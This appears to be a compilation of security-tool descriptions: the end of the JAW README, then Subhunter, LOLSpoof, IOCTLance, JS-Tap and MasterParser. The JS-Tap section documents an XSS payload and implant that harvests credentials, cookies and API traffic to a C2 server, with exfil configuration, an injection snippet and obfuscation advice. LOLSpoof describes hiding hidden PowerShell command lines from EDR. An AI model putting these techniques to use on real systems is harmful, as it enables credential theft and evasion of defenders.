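def dataflow_query(sink_value: str) -> str:
    return (
        "MATCH (source:ASTNode)-[:PDG_REACHES*]->(sink:ASTNode) "
        f"WHERE sink.Code CONTAINS '{sink_value}' "
        "RETURN source.Code, sink.Code"
    )

query = dataflow_query("window.location")
```

A query string like this would then be executed against the imported Neo4j database, e.g. from a script placed under analyses/<ANALYSIS_NAME>.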

        Vulnerability Detection

        This section describes how to configure and use JAW for vulnerability detection, and how to interpret the output. JAW contains, among others, self-contained queries for detecting client-side CSRF and DOM Clobbering.

        Step 1. Enable the analysis component for the vulnerability class in the input config.yaml file:

        request_hijacking:
          enabled: true
          # [...]

        domclobbering:
          enabled: false
          # [...]

        cs_csrf:
          enabled: false
          # [...]

        Step 2. Run an instance of the pipeline with:

        $ python3 -m run_pipeline --conf=config.yaml

        Hint. You can run multiple instances of the pipeline under different screens:

        $ screen -dmS s1 bash -c 'python3 -m run_pipeline --conf=conf1.yaml; exec sh'
        $ screen -dmS s2 bash -c 'python3 -m run_pipeline --conf=conf2.yaml; exec sh'
        $ # [...]

        To generate parallel configuration files automatically, you may use the generate_config.py script.

        How to Interpret the Output of the Analysis?

        The outputs will be stored in a file called sink.flows.out in the same folder as the input. For client-side CSRF, for example, JAW outputs an entry for each detected HTTP request, marking the set of semantic types (a.k.a. semantic tags or labels) associated with the elements constructing the request (i.e., the program slices). For example, an HTTP request marked with the semantic type ['WIN.LOC'] is forgeable through the window.location injection point, whereas a request marked with ['NON-REACH'] is not forgeable.

        An example output entry is shown below:

        [*] Tags: ['WIN.LOC']
        [*] NodeId: {'TopExpression': '86', 'CallExpression': '87', 'Argument': '94'}
        [*] Location: 29
        [*] Function: ajax
        [*] Template: ajaxloc + "/bearer1234/"
        [*] Top Expression: $.ajax({ xhrFields: { withCredentials: "true" }, url: ajaxloc + "/bearer1234/" })

        1:['WIN.LOC'] variable=ajaxloc
        0 (loc:6)- var ajaxloc = window.location.href

        This entry shows that on line 29 there is a $.ajax call expression, and this call expression triggers an ajax request with the URL template value ajaxloc + "/bearer1234/", where the parameter ajaxloc is a program slice reading its value at line 6 from window.location.href, and is thus forgeable through ['WIN.LOC'].
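        The "[*] Key: value" layout of these entries can be consumed mechanically. Below is a minimal parsing sketch based solely on the example entry above; it is not part of JAW itself.

```python
import ast

def parse_entry(text: str) -> dict:
    """Parse the '[*] Key: value' lines of one sink.flows.out entry."""
    entry = {}
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[*]"):
            key, _, value = line[3:].partition(":")
            entry[key.strip()] = value.strip()
    # Tags is printed as a Python-style list literal, e.g. ['WIN.LOC']
    if "Tags" in entry:
        entry["Tags"] = ast.literal_eval(entry["Tags"])
    return entry

sample = """[*] Tags: ['WIN.LOC']
[*] Location: 29
[*] Function: ajax"""
parsed = parse_entry(sample)
```

For the sample above, parsed holds the tag list ['WIN.LOC'] alongside the location and function fields as strings.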

        Test Web Application

        In order to streamline the testing process for JAW and ensure that your setup is correct, we provide a simple Node.js web application which you can test JAW with.

        First, install the dependencies via:

        $ cd tests/test-webapp
        $ npm install

        Then, run the application in a new screen:

        $ screen -dmS jawwebapp bash -c 'PORT=6789 npm run devstart; exec sh'

        Detailed Documentation.

        For more information, visit our wiki page here. Below is a table of contents for quick access.

        The Web Crawler of JAW

        Data Model of Hybrid Property Graphs (HPGs)

        Graph Construction

        Graph Traversals

        Contribution and Code Of Conduct

        Pull requests are always welcomed. This project is intended to be a safe, welcoming space, and contributors are expected to adhere to the contributor code of conduct.

        Academic Publication

        If you use the JAW for academic research, we encourage you to cite the following paper:

        @inproceedings{JAW,
        title = {JAW: Studying Client-side CSRF with Hybrid Property Graphs and Declarative Traversals},
        author= {Soheil Khodayari and Giancarlo Pellegrino},
        booktitle = {30th {USENIX} Security Symposium ({USENIX} Security 21)},
        year = {2021},
        address = {Vancouver, B.C.},
        publisher = {{USENIX} Association},
        }

        Acknowledgements

        JAW has come a long way and we want to give our contributors a well-deserved shoutout here!

        @tmbrbr, @c01gide, @jndre, and Sepehr Mirzaei.



        Subhunter - A Fast Subdomain Takeover Tool

        By: Zion3R


        Subdomain takeover is a common vulnerability that allows an attacker to gain control over a subdomain of a target domain and redirect users intended for an organization's domain to a website that performs malicious activities, such as phishing campaigns or stealing user cookies. Typically, this happens when the subdomain has a CNAME record in DNS, but no host is providing content for it. Subhunter takes a given list of subdomains and scans them to check for this vulnerability.
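        The core check a fingerprint-based takeover scanner performs can be sketched as matching a fetched page body against known service error markers. The fingerprint strings below are illustrative examples only, not Subhunter's actual fingerprint database (which is forked from can-i-take-over-xyz).

```python
# Hypothetical fingerprints: marker strings that unclaimed services
# return when no host is serving content for a dangling CNAME.
FINGERPRINTS = {
    "GitHub Pages": "There isn't a GitHub Pages site here",
    "Heroku": "No such app",
}

def check_body(body: str):
    """Return the matching service name if the body looks takeover-able."""
    for service, marker in FINGERPRINTS.items():
        if marker in body:
            return service
    return None
```

A scanner would resolve each subdomain's CNAME, fetch the page over HTTP, and flag the subdomain as potentially vulnerable when check_body returns a service name.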


        Features:

        • Auto update
        • Uses random user agents
        • Built in Go
        • Uses a fork of fingerprint data from well known sources (can-i-take-over-xyz)

        Installation:

        Option 1:

        Download from releases

        Option 2:

        Build from source:

        $ git clone https://github.com/Nemesis0U/Subhunter.git
        $ go build subhunter.go

        Usage:

        Options:

        Usage of subhunter:
        -l string
        File including a list of hosts to scan
        -o string
        File to save results
        -t int
        Number of threads for scanning (default 50)
        -timeout int
        Timeout in seconds (default 20)

        Demo (Added fake fingerprint for POC):

        ./Subhunter -l subdomains.txt -o test.txt

        ____ _ _ _
        / ___| _ _ | |__ | |__ _ _ _ __ | |_ ___ _ __
        \___ \ | | | | | '_ \ | '_ \ | | | | | '_ \ | __| / _ \ | '__|
        ___) | | |_| | | |_) | | | | | | |_| | | | | | | |_ | __/ | |
        |____/ \__,_| |_.__/ |_| |_| \__,_| |_| |_| \__| \___| |_|


        A fast subdomain takeover tool

        Created by Nemesis

        Loaded 88 fingerprints for current scan

        -----------------------------------------------------------------------------

        [+] Nothing found at www.ubereats.com: Not Vulnerable
        [+] Nothing found at testauth.ubereats.com: Not Vulnerable
        [+] Nothing found at apple-maps-app-clip.ubereats.com: Not Vulnerable
        [+] Nothing found at about.ubereats.com: Not Vulnerable
        [+] Nothing found at beta.ubereats.com: Not Vulnerable
        [+] Nothing found at ewp.ubereats.com: Not Vulnerable
        [+] Nothing found at edgetest.ubereats.com: Not Vulnerable
        [+] Nothing found at guest.ubereats.com: Not Vulnerable
        [+] Google Cloud: Possible takeover found at testauth.ubereats.com: Vulnerable
        [+] Nothing found at info.ubereats.com: Not Vulnerable
        [+] Nothing found at learn.ubereats.com: Not Vulnerable
        [+] Nothing found at merchants.ubereats.com: Not Vulnerable
        [+] Nothing found at guest-beta.ubereats.com: Not Vulnerable
        [+] Nothing found at merchant-help.ubereats.com: Not Vulnerable
        [+] Nothing found at merchants-beta.ubereats.com: Not Vulnerable
        [+] Nothing found at merchants-staging.ubereats.com: Not Vulnerable
        [+] Nothing found at messages.ubereats.com: Not Vulnerable
        [+] Nothing found at order.ubereats.com: Not Vulnerable
        [+] Nothing found at restaurants.ubereats.com: Not Vulnerable
        [+] Nothing found at payments.ubereats.com: Not Vulnerable
        [+] Nothing found at static.ubereats.com: Not Vulnerable

        Subhunter exiting...
        Results written to test.txt




        LOLSpoof - An Interactive Shell To Spoof Some LOLBins Command Line

        By: Zion3R


        LOLSpoof is an interactive shell program that automatically spoofs the command line arguments of the spawned process. Just call your incriminating-looking LOLBin command line (e.g. powershell -w hidden -enc ZwBlAHQALQBwAHIAbwBjAGUA....) and LOLSpoof will ensure that the process creation telemetry appears legitimate and clean.


        Why

        The process command line is a heavily monitored piece of telemetry, thoroughly inspected by AV/EDRs, SOC analysts and threat hunters.

        How

        1. Prepares the spoofed command line out of the real one: lolbin.exe " " * sizeof(real arguments)
        2. Spawns that suspended LOLBin with the spoofed command line
        3. Gets the remote PEB address
        4. Gets the address of RTL_USER_PROCESS_PARAMETERS struct
        5. Gets the address of the command line unicode buffer
        6. Overrides the fake command line with the real one
        7. Resumes the main thread
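        Step 1's padding can be sketched in a few lines: the decoy command line replaces the real arguments with spaces of the same length, so the real arguments fit in the unicode buffer allocated for the command line when they are written back in step 6. This sketch only demonstrates the length bookkeeping, not the Windows API calls.

```python
def spoofed_cmdline(lolbin: str, real_args: str) -> str:
    """Build the decoy command line: lolbin followed by spaces matching
    the length of the real arguments."""
    return f'{lolbin} {" " * len(real_args)}'

real = "-w hidden -enc ZwBlAHQALQBwAHIAbwBjAGUA"
fake = spoofed_cmdline("powershell.exe", real)
```

Because len(fake) equals len of the real command line, overwriting the buffer in the remote PEB never writes past the allocation.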

        Opsec considerations

        Although this simple technique helps to bypass command line detection, it may introduce other suspicious telemetry:

        1. Creation of a suspended process
        2. The new process has trailing spaces (but it's really easy to use a repeated character or even random data instead)
        3. Writes to the spawned process with WriteProcessMemory

        Build

        Built with Nim 1.6.12 (compiling with Nim 2.X yields errors!)

        nimble install winim

        Known issue

        Programs that clear or change previously printed console messages (such as timeout.exe 10) break the program. When such commands are employed, you'll need to restart the console. I don't know how to fix that yet; open to suggestions.



        Ioctlance - A Tool That Is Used To Hunt Vulnerabilities In X64 WDM Drivers

        By: Zion3R

        Description

        Presented at CODE BLUE 2023, this project, titled Enhanced Vulnerability Hunting in WDM Drivers with Symbolic Execution and Taint Analysis, introduces IOCTLance, a tool that detects various vulnerability types in Windows Driver Model (WDM) drivers. In a comprehensive evaluation involving 104 known vulnerable WDM drivers and 328 unknown ones, IOCTLance successfully unveiled 117 previously unidentified vulnerabilities within 26 distinct drivers. As a result, 41 CVEs were reported, encompassing 25 cases of denial of service, 5 instances of insufficient access control, and 11 examples of elevation of privilege.


        Features

        Target Vulnerability Types

        • map physical memory
        • controllable process handle
        • buffer overflow
        • null pointer dereference
        • read/write controllable address
        • arbitrary shellcode execution
        • arbitrary wrmsr
        • arbitrary out
        • dangerous file operation

        Optional Customizations

        • length limit
        • loop bound
        • total timeout
        • IoControlCode timeout
        • recursion
        • symbolize data section

        Build

        Docker (Recommended)

        docker build .

        Local

        dpkg --add-architecture i386
        apt-get update
        apt-get install git build-essential python3 python3-pip python3-dev htop vim sudo \
        openjdk-8-jdk zlib1g:i386 libtinfo5:i386 libstdc++6:i386 libgcc1:i386 \
        libc6:i386 libssl-dev nasm binutils-multiarch qtdeclarative5-dev libpixman-1-dev \
        libglib2.0-dev debian-archive-keyring debootstrap libtool libreadline-dev cmake \
        libffi-dev libxslt1-dev libxml2-dev

        pip install angr==9.2.18 ipython==8.5.0 ipdb==0.13.9

        Analysis

        # python3 analysis/ioctlance.py -h
        usage: ioctlance.py [-h] [-i IOCTLCODE] [-T TOTAL_TIMEOUT] [-t TIMEOUT] [-l LENGTH] [-b BOUND]
        [-g GLOBAL_VAR] [-a ADDRESS] [-e EXCLUDE] [-o] [-r] [-c] [-d]
        path

        positional arguments:
        path dir (including subdirectory) or file path to the driver(s) to analyze

        optional arguments:
        -h, --help show this help message and exit
        -i IOCTLCODE, --ioctlcode IOCTLCODE
        analyze specified IoControlCode (e.g. 22201c)
        -T TOTAL_TIMEOUT, --total_timeout TOTAL_TIMEOUT
        total timeout for the whole symbolic execution (default 1200, 0 to unlimited)
        -t TIMEOUT, --timeout TIMEOUT
        timeout for analyze each IoControlCode (default 40, 0 to unlimited)
        -l LENGTH, --length LENGTH
        the limit on the number of instructions for technique LengthLimiter (default 0, 0 to unlimited)
        -b BOUND, --bound BOUND
        the bound for technique LoopSeer (default 0, 0 to unlimited)
        -g GLOBAL_VAR, --global_var GLOBAL_VAR
        symbolize how many bytes in .data section (default 0 hex)
        -a ADDRESS, --address ADDRESS
        address of ioctl handler to directly start hunting with blank state (e.g.
        140005c20)
        -e EXCLUDE, --exclude EXCLUDE
        exclude function address split with , (e.g. 140005c20,140006c20)
        -o, --overwrite overwrite x.sys.json if x.sys has been analyzed (default False)
        -r, --recursion do not kill state if detecting recursion (default False)
        -c, --complete get complete base state (default False)
        -d, --debug print debug info while analyzing (default False)

        Evaluation

        # python3 evaluation/statistics.py -h
        usage: statistics.py [-h] [-w] path

        positional arguments:
        path target dir or file path

        optional arguments:
        -h, --help show this help message and exit
        -w, --wdm copy the wdm drivers into <path>/wdm

        Test

        1. Compile the testing examples in test to generate testing driver files.
        2. Run IOCTLance against the driver files.

        Reference



        JS-Tap - JavaScript Payload And Supporting Software To Be Used As XSS Payload Or Post Exploitation Implant To Monitor Users As They Use The Targeted Application

        By: Zion3R


        JavaScript payload and supporting software to be used as XSS payload or post exploitation implant to monitor users as they use the targeted application. Also includes a C2 for executing custom JavaScript payloads in clients.


        Changelogs

        Major changes are documented in the project Announcements:
        https://github.com/hoodoer/JS-Tap/discussions/categories/announcements

        Demo

        You can read the original blog post about JS-Tap here:
        https://trustedsec.com/blog/js-tap-weaponizing-javascript-for-red-teams

        Short demo from ShmooCon of JS-Tap version 1:
        https://youtu.be/IDLMMiqV6ss?si=XunvnVarqSIjx_x0&t=19814

        Demo of JS-Tap version 2 at HackSpaceCon, including C2 and how to use it as a post exploitation implant:
        https://youtu.be/aWvNLJnqObQ?t=11719

        A demo can also be seen in this webinar:
        https://youtu.be/-c3b5debhME?si=CtJRqpklov2xv7Um

        Upgrade warning

        I do not plan on creating migration scripts for the database, and version number bumps often involve database schema changes (check the changelogs). You should probably delete your jsTap.db database on version bumps. If you have custom payloads in your JS-Tap server, make sure you export them before the upgrade.

        Introduction

        JS-Tap is a generic JavaScript payload and supporting software to help red teamers attack webapps. The JS-Tap payload can be used as an XSS payload or as a post exploitation implant.

        The payload does not require the targeted user running the payload to be authenticated to the application being attacked, and it does not require any prior knowledge of the application beyond finding a way to get the JavaScript into the application.

        Instead of attacking the application server itself, JS-Tap focuses on the client-side of the application and heavily instruments the client-side code.

        The example JS-Tap payload is contained in the telemlib.js file in the payloads directory; however, any file in this directory is served unauthenticated. Copy the telemlib.js file to whatever filename you wish and modify the configuration as needed. This file has not been obfuscated. Before using it in an engagement, strongly consider changing the naming of endpoints, stripping comments, and heavily obfuscating the payload.

        Make sure you review the configuration section below carefully before using on a publicly exposed server.

        Data Collected

        • Client IP address, OS, Browser
        • User inputs (credentials, etc.)
        • URLs visited
        • Cookies (that don't have httponly flag set)
        • Local Storage
        • Session Storage
        • HTML code of pages visited (if feature enabled)
        • Screenshots of pages visited
        • Copy of Form Submissions
        • Copy of XHR API calls (if monkeypatch feature enabled)
          • Endpoint
          • Method (GET, POST, etc.)
          • Headers set
          • Request body and response body
        • Copy of Fetch API calls (if monkeypatch feature enabled)
          • Endpoint
          • Method (GET, POST, etc.)
          • Headers set
          • Request body and response body

        Note: the ability to receive copies of XHR and Fetch API calls works in trap mode. In implant mode, only Fetch API calls can currently be copied.

        Operating Modes

        The payload has two modes of operation. Whether the mode is trap or implant is set in the initGlobals() function, search for the window.taperMode variable.

        Trap Mode

        Trap mode is typically the mode you would use as an XSS payload. Execution of XSS payloads is often fleeting: the user viewing the page where the malicious JavaScript payload runs may close the browser tab (the page isn't interesting) or navigate elsewhere in the application. In both cases, the payload will be deleted from memory and stop working. JS-Tap needs to run for a long time or you won't collect useful data.

        Trap mode combats this by establishing persistence using an iFrame trap technique. The JS-Tap payload will create a full page iFrame, and start the user elsewhere in the application. This starting page must be configured ahead of time. In the initGlobals() function search for the window.taperstartingPage variable and set it to an appropriate starting location in the target application.

        In trap mode JS-Tap monitors the location of the user in the iframe trap and it spoofs the address bar of the browser to match the location of the iframe.

        Note that the application targeted must allow iFraming from same-origin or self if it's setting CSP or X-Frame-Options headers. JavaScript based framebusters can also prevent iFrame traps from working.

        Note, I've had good luck using trap mode for a post exploitation implant in very specific locations of an application, or when I'm not sure what resources the application is using inside the authenticated section of the application. You can put an implant in the login page, with trap mode and the trap mode start page set to window.location.href (i.e. the current location). The trap will be set when the user visits the login page, and they'll hopefully continue into the authenticated portions of the application inside the iframe trap.

        A user refreshing the page will generally break/escape the iframe trap.

        Implant Mode

        Implant mode would typically be used if you're directly adding the payload into the targeted application. Perhaps you have a shell on the server that hosts the JavaScript files for the application. Add the payload to a JavaScript file that's used throughout the application (jQuery, main.js, etc.). Which file would be ideal really depends on the app in question and how it's using JavaScript files. Implant mode does not require a starting page to be configured, and does not use the iFrame trap technique.

        A user refreshing the page in implant mode will generally continue to run the JS-Tap payload.

        Installation and Start

        Requires python3. A large number of dependencies are required for the jsTapServer, you are highly encouraged to use python virtual environments to isolate the libraries for the server software (or whatever your preferred isolation method is).

        Example:

        mkdir jsTapEnvironment
        python3 -m venv jsTapEnvironment
        source jsTapEnvironment/bin/activate
        cd jsTapEnvironment
        git clone https://github.com/hoodoer/JS-Tap
        cd JS-Tap
        pip3 install -r requirements.txt

        run in debug/single thread mode:
        python3 jsTapServer.py

        run with gunicorn multithreaded (production use):
        ./jstapRun.sh

        A new admin password is generated on startup. If you didn't catch it in the startup print statements you can find the credentials saved to the adminCreds.txt file.

        If an existing database is found by jsTapServer on startup it will ask you if you want to keep existing clients in the database or drop those tables to start fresh.

        Note that on Mac I also had to install libmagic outside of python.

        brew install libmagic

        Playing with JS-Tap locally is fine, but to use it in a proper engagement you'll need to run JS-Tap on a publicly accessible VPS and set up JS-Tap with PROXYMODE set to True. Use NGINX on the front end to handle a valid certificate.

        Configuration

        JS-Tap Server Configuration

        Debug/Single thread config

        If you're running JS-Tap with the jsTapServer.py script in single threaded mode (great for testing/demos) there are configuration options directly in the jsTapServer.py script.

        Proxy Mode

        For production use JS-Tap should be hosted on a publicly available server with a proper SSL certificate from someone like letsencrypt. The easiest way to deploy this is to allow NGINX to act as a front-end to JS-Tap and handle the letsencrypt cert, and then forward the decrypted traffic to JS-Tap as HTTP traffic locally (i.e. NGINX and JS-Tap run on the same VPS).

        If you set proxyMode to true, JS-Tap server will run in HTTP mode, and take the client IP address from the X-Forwarded-For header, which NGINX needs to be configured to set.

        When proxyMode is set to false, JS-Tap will run with a self-signed certificate, which is useful for testing. The client IP will be taken from the source IP of the client.
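
The IP-resolution behaviour described above can be sketched in Python (an illustrative model only, not JS-Tap's actual code; the function name is made up):

```python
def client_ip(headers, remote_addr, proxy_mode):
    """Resolve the real client IP for either deployment mode."""
    if proxy_mode:
        # Behind NGINX: trust the X-Forwarded-For header NGINX sets.
        # Take the first entry in case upstream proxies appended more.
        forwarded = headers.get("X-Forwarded-For", "")
        if forwarded:
            return forwarded.split(",")[0].strip()
    # Direct connection (proxyMode false): use the TCP source address.
    return remote_addr
```

Note that this only works safely when NGINX always overwrites the header; otherwise a client could spoof its own X-Forwarded-For value.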

        Data Directory

        The dataDirectory parameter tells JS-Tap where the directory is to use for the SQLite database and loot directory. Not all "loot" is stored in the database, screenshots and scraped HTML files in particular are not.

        Server Port

        To change the server port configuration see the last line of jsTapServer.py

        app.run(debug=False, host='0.0.0.0', port=8444, ssl_context='adhoc')

        Gunicorn Production Configuration

        Gunicorn is the preferred means of running JS-Tap in production. The same settings mentioned above can be set in the jstapRun.sh bash script. Values set in the startup script take precedence over the values set directly in the jsTapServer.py script when JS-Tap is started with the gunicorn startup script.

A big difference in configuration when using Gunicorn for serving the application is that you need to configure the number of workers (heavyweight processes) and threads (lightweight serving processes). JS-Tap is a very I/O heavy application, so using threads in addition to workers is beneficial in scaling up the application on multi-processor machines. Note that if you're using NGINX on the same box you need to configure NGINX to also use multiple processes so you don't bottleneck on the proxy itself.

At the top of the jstapRun.sh script are the numWorkers and numThreads parameters. I like to use the number of CPUs + 1 for workers, and 4-8 threads depending on how beefy the processors are. In the NGINX configuration I typically set worker_processes auto;
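
The "CPUs + 1" rule of thumb can be computed at startup; a small sketch (the variable names mirror the script's numWorkers/numThreads but this is not part of JS-Tap itself):

```python
import os

# Rule of thumb from above: one worker per CPU, plus one.
num_workers = os.cpu_count() + 1

# 4-8 threads per worker depending on processor strength; pick a mid value.
num_threads = 6

print(f"gunicorn --workers {num_workers} --threads {num_threads}")
```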

        Proxy Mode is set by the PROXYMODE variable, and the data directory with the DATADIRECTORY variable. Note the data directory variable needs a trailing '/' added.

        Using the gunicorn startup script will use a self-signed cert when started with PROXYMODE set to False. You need to generate that self-signed cert first with:
        openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

        telemlib.js Configuration

        These configuration variables are in the initGlobals() function.

        JS-Tap Server Location

        You need to configure the payload with the URL of the JS-Tap server it will connect back to.

        window.taperexfilServer = "https://127.0.0.1:8444";

        Mode

Set to either trap or implant. This is set with the variable:

        window.taperMode = "trap";
        or
        window.taperMode = "implant";

        Trap Mode Starting Page

        Only needed for trap mode. See explanation in Operating Modes section above.
        Sets the page the user starts on when the iFrame trap is set.

        window.taperstartingPage = "http://targetapp.com/somestartpage";

        If you want the trap to start on the current page, instead of redirecting the user to a different page in the iframe trap, you can use:

        window.taperstartingPage = window.location.href;

        Client Tag

Useful if you're using JS-Tap against multiple applications or deployments at once and want a visual indicator of what payload was loaded. Remember that the entire /payloads directory is served; you can have multiple JS-Tap payloads configured with different modes, start pages, and client tags.

This tag string (keep it short!) is prepended to the client nickname in the JS-Tap portal. Set up multiple payloads, each with the appropriate configuration for the application it's being used against, and add a tag indicating which app the client is running.

        window.taperTag = 'whatever';

        Custom Payload Tasks

Used to set whether clients check for Custom Payload tasks, and how often they check. The jitter settings let you optionally set a floor and ceiling modifier. A random value between these two numbers will be picked and added to the check delay. Set these to 0 and 0 for no jitter.

        window.taperTaskCheck        = true;
        window.taperTaskCheckDelay = 5000;
        window.taperTaskJitterBottom = -2000;
        window.taperTaskJitterTop = 2000;
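
The resulting check interval can be modeled in a few lines of Python (an illustrative sketch of the behaviour described above, not the payload's actual JavaScript):

```python
import random

def next_check_delay(base_delay, jitter_bottom, jitter_top):
    """Base delay in ms plus a random jitter between floor and ceiling."""
    return base_delay + random.randint(jitter_bottom, jitter_top)

# Matches the example configuration: 5000 ms with a +/- 2000 ms jitter,
# so each task check happens somewhere between 3 and 7 seconds apart.
delay = next_check_delay(5000, -2000, 2000)
```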

        Exfiltrate HTML

        true/false setting on whether a copy of the HTML code of each page viewed is exfiltrated.

        window.taperexfilHTML = true;

        Copy Form Submissions

        true/false setting on whether to intercept a copy of all form posts.

        window.taperexfilFormSubmissions = true;

        MonkeyPatch APIs

Enable monkeypatching of the XHR and Fetch APIs. This works in trap mode. In implant mode, only the Fetch API is monkeypatched. Monkeypatching allows JavaScript to be rewritten at runtime. Enabling this feature re-writes the XHR and Fetch networking APIs used by JavaScript code in order to tap the contents of those network calls. Note that jQuery-based network calls will be captured via the XHR API, which jQuery uses under the hood for network calls.

        window.monkeyPatchAPIs = true;

        Screenshot after API calls

        By default JS-Tap will capture a new screenshot after the user navigates to a new page. Some applications do not change their path when new data is loaded, which would cause missed screenshots. JS-Tap can be configured to capture a new screenshot after an XHR or Fetch API call is made. These API calls are often used to retrieve new data to display. Two settings are offered, one to enable the "after API call screenshot", and a delay in milliseconds. X milliseconds after the API call JS-Tap will capture the new screenshot.

        window.postApiCallScreenshot = true;
        window.screenshotDelay = 1000;

        JS-Tap Portal

        Login with the admin credentials provided by the server script on startup.

        Clients show up on the left, selecting one will show a time series of their events (loot) on the right.

        The clients list can be sorted by time (first seen, last update received) and the list can be filtered to only show the "starred" clients. There is also a quick filter search above the clients list that allows you to quickly filter clients that have the entered string. Useful if you set an optional tag in the payload configuration. Optional tags show up prepended to the client nickname.

Each client has an 'x' button (near the star button). This deletes the session for that client; if they're sending junk or useless data, this prevents that client from submitting future data.

When the JS-Tap payload starts, it retrieves a session from the JS-Tap server. If you want to stop all new client sessions from being issued, select Session Settings at the top and you can disable new client sessions. You can also block specific IP addresses from receiving a session here.

Each client has a "notes" feature. If you find juicy information for that particular client (credentials, API tokens, etc.) you can add it to the client notes. After you've reviewed all your clients and made your notes, the View All Notes feature at the top allows you to export all notes from all clients at once.

        The events list can be filtered by event type if you're trying to focus on something specific, like screenshots. Note that the events/loot list does not automatically update (the clients list does). If you want to load the latest events for the client you need to select the client again on the left.

        Custom Payloads

        Starting in version 1.02 there is a custom payload feature. Multiple JavaScript payloads can be added in the JS-Tap portal and executed on a single client, all current clients, or set to autorun on all future clients. Payloads can be written/edited within the JS-Tap portal, or imported from a file. Payloads can also be exported. The format for importing payloads is simple JSON. The JavaScript code and description are simply base64 encoded.

        [{"code":"YWxlcnQoJ1BheWxvYWQgMSBmaXJpbmcnKTs=","description":"VGhlIGZpcnN0IHBheWxvYWQ=","name":"Payload 1"},{"code":"YWxlcnQoJ1BheWxvYWQgMiBmaXJpbmcnKTs=","description":"VGhlIHNlY29uZCBwYXlsb2Fk","name":"Payload 2"}]
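
An import file in this format can be generated with a few lines of Python (a sketch; the payload code and names here are the same placeholders used in the example above):

```python
import base64
import json

def encode_payload(name, code, description):
    """Build one entry in JS-Tap's custom payload import format:
    the JavaScript code and description are base64 encoded."""
    b64 = lambda s: base64.b64encode(s.encode()).decode()
    return {"code": b64(code), "description": b64(description), "name": name}

payloads = [
    encode_payload("Payload 1", "alert('Payload 1 firing');", "The first payload"),
    encode_payload("Payload 2", "alert('Payload 2 firing');", "The second payload"),
]
print(json.dumps(payloads))
```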

        The main user interface for custom payloads is from the top menu bar. Select Custom Payloads to open the interface. Any existing payloads will be shown in a list on the left. The button bar allows you to import and export the list. Payloads can be edited on the right side. To load an existing payload for editing select the payload by clicking on it in the Saved Payloads list. Once you have payloads defined and saved, you can execute them on clients.

        In the main Custom Payloads view you can launch a payload against all current clients (the Run Payload button). You can also toggle on the Autorun attribute of a payload, which means that all new clients will run the payload. Note that existing clients will not run a payload based on the Autorun setting.

        You can toggle on Repeat Payload and the payload will be tasked for each client when they check for tasks. Remember, the rate that a client checks for custom payload tasks is variable, and that rate can be changed in the main JS-Tap payload configuration. That rate can be changed with a custom payload (calling the updateTaskCheckInterval(newDelay) function). The jitter in the task check delay can be set with the updateTaskCheckJitter(newTop, newBottom) function.

        The Clear All Jobs button in the custom payload UI will delete all custom payload jobs from the queue for all clients and resets the auto/repeat run toggles.

To run a payload on a single client, use the Run Payload button on the specific client you wish to run it on, and then hit the run button for the specific payload you wish to use. You can also set Repeat Payload on individual clients.

        Tools

        A few tools are included in the tools subdirectory.

        clientSimulator.py

        A script to stress test the jsTapServer. Good for determining roughly how many clients your server can handle. Note that running the clientSimulator script is probably more resource intensive than the actual jsTapServer, so you may wish to run it on a separate machine.

At the top of the script is a numClients variable, set to how many clients you want to simulate. The script will spawn a thread for each, retrieve a client session, and send data in, simulating a client.

        numClients = 50

        You'll also need to configure where you're running the jsTapServer for the clientSimulator to connect to:

        apiServer = "https://127.0.0.1:8444"

        JS-Tap run using gunicorn scales quite well.

        MonkeyPatchApp

A simple app used for testing XHR/Fetch monkeypatching; it also works as a general test target for the payload.

        Run with:

        python3 monkeyPatchLab.py

        By default this will start the application running on:

        https://127.0.0.1:8443

Pressing the "Inject JS-Tap payload" button will run the JS-Tap payload. This works for either implant or trap mode. You may need to point the monkeyPatchLab application at a new JS-Tap server location for loading the payload file; you can find this set in the injectPayload() function in main.js

        function injectPayload()
        {
        document.head.appendChild(Object.assign(document.createElement('script'),
        {src:'https://127.0.0.1:8444/lib/telemlib.js',type:'text/javascript'}));
        }

        formParser.py

An abandoned tool; it is a good start on analyzing HTML for forms and parsing out their parameters. Intended to help automatically generate JavaScript payloads to target form posts.

        You should be able to run it on exfiltrated HTML files. Again, this is currently abandonware.

        generateIntelReport.py

No longer working; it was used before the web UI for JS-Tap. The generateIntelReport script would comb through the gathered loot and generate a PDF report. Saving all the loot to disk is now disabled for performance reasons; most of it is stored in the database, with the exception of exfiltrated HTML code and screenshots.

        Contact

        @hoodoer
        hoodoer@bitwisemunitions.dev



        MasterParser - Powerful DFIR Tool Designed For Analyzing And Parsing Linux Logs

        By: Zion3R


        What is MasterParser ?

MasterParser stands as a robust Digital Forensics and Incident Response tool meticulously crafted for the analysis of Linux logs within the /var/log directory. Specifically designed to expedite the investigative process for security incidents on Linux systems, MasterParser adeptly scans supported logs, such as auth.log, extracting critical details including SSH logins, user creations, event names, IP addresses and much more. The tool's generated summary presents this information in a clear and concise format, enhancing efficiency and accessibility for Incident Responders. Beyond its immediate utility for DFIR teams, MasterParser proves invaluable to the broader InfoSec and IT community, contributing significantly to the swift and comprehensive assessment of security events on Linux platforms.


        MasterParser Wallpapers

        Love MasterParser as much as we do? Dive into the fun and jazz up your screen with our exclusive MasterParser wallpaper! Click the link below and get ready to add a splash of excitement to your device! Download Wallpaper

        Supported Logs Format

This is the list of supported log formats within the /var/log directory that MasterParser can analyze. In future updates, MasterParser will support additional log formats for analysis.

Supported Log Formats List
auth.log

        Feature & Log Format Requests:

If you wish to propose the addition of a new feature / log format, kindly submit your request by creating an issue: Click here to create a request

        How To Use ?

        How To Use - Text Guide

1. From this GitHub repository press "<> Code" and then press "Download ZIP".
2. From "MasterParser-main.zip" extract the folder "MasterParser-main" to your Desktop.
3. Open a PowerShell terminal and navigate to the "MasterParser-main" folder.
# How to navigate to "MasterParser-main" folder from the PS terminal
PS C:\> cd "C:\Users\user\Desktop\MasterParser-main\"
4. Now you can execute the tool; for example, to see the tool's command menu, do this:
# How to show MasterParser menu
PS C:\Users\user\Desktop\MasterParser-main> .\MasterParser.ps1 -O Menu
5. To run the tool, put all your /var/log/* logs into the 01-Logs folder, and execute the tool like this:
# How to run MasterParser
PS C:\Users\user\Desktop\MasterParser-main> .\MasterParser.ps1 -O Start
6. That's it, enjoy the tool!

        How To Use - Video Guide

        https://github.com/YosfanEilay/MasterParser/assets/132997318/d26b4b3f-7816-42c3-be7f-7ee3946a2c70

        MasterParser Social Media Publications

        Social Media Posts
        1. First Tool Post
        2. First Tool Story Publication By Help Net Security
        3. Second Tool Story Publication By Forensic Focus
